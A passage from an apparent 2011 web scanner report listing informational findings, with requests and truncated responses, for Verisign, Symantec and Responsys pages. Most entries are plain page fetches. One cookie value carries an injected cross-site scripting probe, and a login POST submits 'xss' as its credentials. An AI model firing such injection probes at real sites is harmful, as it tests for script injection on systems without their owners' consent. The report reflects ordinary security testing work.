Server: Apache
Last-Modified: Wed, 19 May 2010 07:38:58 GMT
ETag: "2ef9310-155-486ed8d030880"
Accept-Ranges: bytes
Content-Length: 341
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Permission Policy</title>
<meta http-equiv="Refresh" content="0; URL=./permission.htm"
<meta http-equiv="Content-Ty
...[SNIP]...

21.39. https://policy3.responsys.net/permission.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://policy3.responsys.net
Path:   /permission.htm

Request

GET /permission.htm HTTP/1.1
Host: policy3.responsys.net
Connection: keep-alive
Referer: https://policy3.responsys.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:40:00 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 07:38:58 GMT
ETag: "2531311-130d-486ed8d030880"
Accept-Ranges: bytes
Content-Length: 4877
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Permission Policy</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
</head>
<body b
...[SNIP]...

21.40. https://policy3.responsys.net/privacy.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://policy3.responsys.net
Path:   /privacy.htm

Request

GET /privacy.htm HTTP/1.1
Host: policy3.responsys.net
Connection: keep-alive
Referer: https://policy3.responsys.net/permission.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:40:06 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 07:38:58 GMT
ETag: "1f21312-1bfd-486ed8d030880"
Accept-Ranges: bytes
Content-Length: 7165
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Responsys Privacy Policy</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
</head>

...[SNIP]...

21.41. https://press.verisign.com/easyir/customrel.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://press.verisign.com
Path:   /easyir/customrel.do

Request

GET /easyir/customrel.do HTTP/1.1
Host: press.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Servlet/3.0; JBossAS-6
Content-Length: 1286
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <!-- so that relative references will use absolute url from jsp
                   and not from calling
...[SNIP]...

21.42. https://products.verisign.com/geocenter/reseller/doregister.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://products.verisign.com
Path:   /geocenter/reseller/doregister.do

Request

GET /geocenter/reseller/doregister.do?vatCountry= HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:19 GMT
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 8588


<html>
<head>


<title>Referring Partner Code Error</title>
<link href="/geocenter/style.css" type=text/css rel="stylesheet">
<style type=
...[SNIP]...

21.43. https://products.verisign.com/geocenter/reseller/logon.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://products.verisign.com
Path:   /geocenter/reseller/logon.do

Request

POST /geocenter/reseller/logon.do HTTP/1.1
Host: products.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false
Content-Length: 40
Cache-Control: max-age=0
Origin: https://knowledge.verisign.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765

userName=xss&password=xss&submit=Sign+In

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:02 GMT
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 17164


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>


<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...

21.44. https://products.verisign.com/geocenter/reseller/logon.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://products.verisign.com
Path:   /geocenter/reseller/logon.jsp

Request

GET /geocenter/reseller/logon.jsp HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:15 GMT
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 17095


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>


<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...

21.45. https://products.verisign.com/geocenter/reseller/register.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://products.verisign.com
Path:   /geocenter/reseller/register.do

Request

GET /geocenter/reseller/register.do HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:16 GMT
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 8588


<html>
<head>


<title>Referring Partner Code Error</title>
<link href="/geocenter/style.css" type=text/css rel="stylesheet">
<style type=
...[SNIP]...

21.46. https://query.verisign.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   https://query.verisign.com
Path:   /search

Request

GET /search HTTP/1.1
Host: query.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:20 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 44676
Connection: close


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="c
...[SNIP]...

21.47. https://renewals.symantec.com/renewals/application

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/application

Request

GET /renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:50 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
Content-Length: 21436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />


<!-- BEGIN
...[SNIP]...

21.48. https://renewals.symantec.com/renewals/chat_form.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/chat_form.jsp

Request

GET /renewals/chat_form.jsp HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?page=renewal_search.jsp&action=button(submit)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(document.location)//6e6ee0889dd&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; JSESSIONID=kTPJTqGNKfPrjNnpLGPypQ8JJCYnkLr5W1R124KMsH1FBQvFMQ07!1524362598; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_pers=%20s_nr%3D1315622354515-New%7C1336358354515%3B%20event69%3Devent69%7C1336358354517%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:39:05 GMT
Content-Type: text/html
Content-Length: 15726

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- BEGIN IMPORT_INCLUDE-->


<!--END IMPORT_INCLUDE-->


<html>
<head><ti
...[SNIP]...

21.49. https://renewals.symantec.com/renewals/chat_norton.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/chat_norton.jsp

Request

GET /renewals/chat_norton.jsp HTTP/1.1
Host: renewals.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:25 GMT
Content-Length: 1638
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">
<head>

...[SNIP]...

21.50. https://renewals.symantec.com/renewals/renewal_search.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/renewal_search.jsp

Request

GET /renewals/renewal_search.jsp HTTP/1.1
Host: renewals.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 21436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />


<!-- BEGIN
...[SNIP]...

21.51. https://renewals.symantec.com/renewals/symantec_where_sn.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/symantec_where_sn.jsp

Request

GET /renewals/symantec_where_sn.jsp HTTP/1.1
Host: renewals.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:25 GMT
Content-Length: 10220
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

21.52. https://seal.verisign.com/getseal

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seal.verisign.com
Path:   /getseal

Request

GET /getseal HTTP/1.1
Host: seal.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, must-revalidate
ETag:
Content-Type: text/javascript
Date: Fri, 09 Sep 2011 21:46:24 GMT
Connection: close

<!-- x=1; -->

21.53. https://securitycenter.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitycenter.verisign.com
Path:   /

Request

GET / HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE1WkhKCKMQP1p2JJzrZf2h3PXz1qghWLRzUhS1WUJUiNzxbzTT!-1800460983

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:41 GMT
Content-length: 129
Content-type: text/html
Last-modified: Thu, 23 Dec 2004 19:39:49 GMT
Etag: "81-41cb1f05"
Accept-ranges: bytes

<html>
<head>
<meta http-equiv="Refresh" content="0; url=https://www.verisign.com/products/site/">
</head>
<body></body>
</html>

21.54. https://securitycenter.verisign.com/celp/enroll/outsideSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/outsideSearch

Request

GET /celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:33 GMT
Content-type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=OqJ5OZYQ2WaOK1XBACbZvE969n6D9cN3GA67zeaCICg9DN3y5YkW!-1800460983; path=/
Connection: close


<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8"/>
<title>


   Search for SSL or Code Signing Certificates from VeriSig
...[SNIP]...

21.55. https://test-products.verisign.com/geocenter/reseller/logon.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://test-products.verisign.com
Path:   /geocenter/reseller/logon.do

Request

GET /geocenter/reseller/logon.do HTTP/1.1
Host: test-products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 17100


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>


<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...

21.56. https://us.norton.com/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.norton.com
Path:   /index.jsp

Request

GET /index.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=2601
Date: Fri, 09 Sep 2011 21:47:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 90635

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Norton - Antivirus Software, Spyware Protection and Personal Firewall by Sym
...[SNIP]...

21.57. https://vipmobile.verisign.com/home.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vipmobile.verisign.com
Path:   /home.v

Request

GET /home.v HTTP/1.1
Host: vipmobile.verisign.com
Connection: keep-alive
Referer: https://idprotect.verisign.com/orderstart.v
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:52:06 GMT
Server: Apache
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 16260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

...[SNIP]...

21.58. https://vipmobile.verisign.com/supportedphones.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vipmobile.verisign.com
Path:   /supportedphones.v

Request

GET /supportedphones.v HTTP/1.1
Host: vipmobile.verisign.com
Connection: keep-alive
Referer: https://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:46 GMT
Server: Apache
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 1508897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

...[SNIP]...

21.59. https://www-secure.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /

Request

GET / HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1117
Date: Fri, 09 Sep 2011 21:47:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42824

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Symantec - AntiVirus, Anti-Spyware, Endpoint Security, Backup, Storage Solut
...[SNIP]...

21.60. https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /about/profile/policies/eulas/index.jsp

Request

GET /about/profile/policies/eulas/index.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1717
Date: Fri, 09 Sep 2011 21:47:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 98373

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Product License Agreements - Symantec Corp.</title>
<meta http-equiv="Conten
...[SNIP]...

21.61. https://www-secure.symantec.com/about/profile/policies/legal.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /about/profile/policies/legal.jsp

Request

GET /about/profile/policies/legal.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1694
Date: Fri, 09 Sep 2011 21:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59713

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Legal Notices</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Conten
...[SNIP]...

21.62. https://www-secure.symantec.com/about/profile/policies/privacy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /about/profile/policies/privacy.jsp

Request

GET /about/profile/policies/privacy.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1721
Date: Fri, 09 Sep 2011 21:47:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82442

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Complete Privacy Policy - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...

21.63. https://www-secure.symantec.com/business/theme.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /business/theme.jsp

Request

GET /business/theme.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1688
Date: Fri, 09 Sep 2011 21:47:38 GMT
Content-Length: 0
Connection: close


21.64. https://www-secure.symantec.com/feedback/contactus.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /feedback/contactus.jsp

Request

GET /feedback/contactus.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1684
Date: Fri, 09 Sep 2011 21:47:32 GMT
Content-Length: 29862
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Contact Us - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http
...[SNIP]...

21.65. https://www-secure.symantec.com/feedback/webmaster.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /feedback/webmaster.jsp

Request

GET /feedback/webmaster.jsp?theURL= HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1677
Date: Fri, 09 Sep 2011 21:47:32 GMT
Content-Length: 24273
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Report a Broken Link - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>

...[SNIP]...

21.66. https://www-secure.symantec.com/globalsites/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /globalsites/index.jsp

Request

GET /globalsites/index.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
